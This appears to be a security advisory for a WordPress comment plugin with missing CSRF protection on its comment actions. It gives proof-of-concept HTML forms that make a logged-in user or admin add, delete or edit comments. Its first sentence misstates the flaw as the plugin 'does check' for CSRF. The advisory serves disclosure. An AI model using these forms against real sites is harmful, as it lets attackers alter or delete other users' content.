The plugin does check for CSRF when adding, editing and deleting comments, which could allow attacker to make logged in users such as admin edit and delete arbitrary comment, or the user who made the comment to edit it via a CSRF attack. Attackers could also make logged in users post arbitrary comment. Other affected actions: wpdCloseThread (to close/open threads), wpdStickComment (to stick/unstick a comment)
To make the logged in user add a comment <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpdAddComment" /> <input type="hidden" name="wc_comment" value="Comment added via CSRF" /> <input type="hidden" name="submit" value="Post Comment" /> <input type="hidden" name="wpdiscuz_unique_id" value="dummy" /> <input type="hidden" name="postId" value="811" /> <input type="submit" value="Submit request" /> </form> </body> </html> To delete a comment (CSRF against an admin) <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpdDeleteComment" /> <input type="hidden" name="id" value="27" /> <input type="submit" value="Submit request" /> </form> </body> </html> To edit a comment (CSRF against user who made the comment or an admin to modify any comment) <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpdSaveEditedComment" /> <input type="hidden" name="commentId" value="6" /> <input type="hidden" name="wc_comment" value="Attacker CSRF" /> <input type="hidden" name="postId" value="811" /> <input type="submit" value="Submit request" /> </form> </body> </html>
YouTube Video
Brandon Roldan
Brandon Roldan
Yes
2021-10-11 (about 1 years ago)
2021-10-11 (about 1 years ago)
2022-04-08 (about 1 years ago)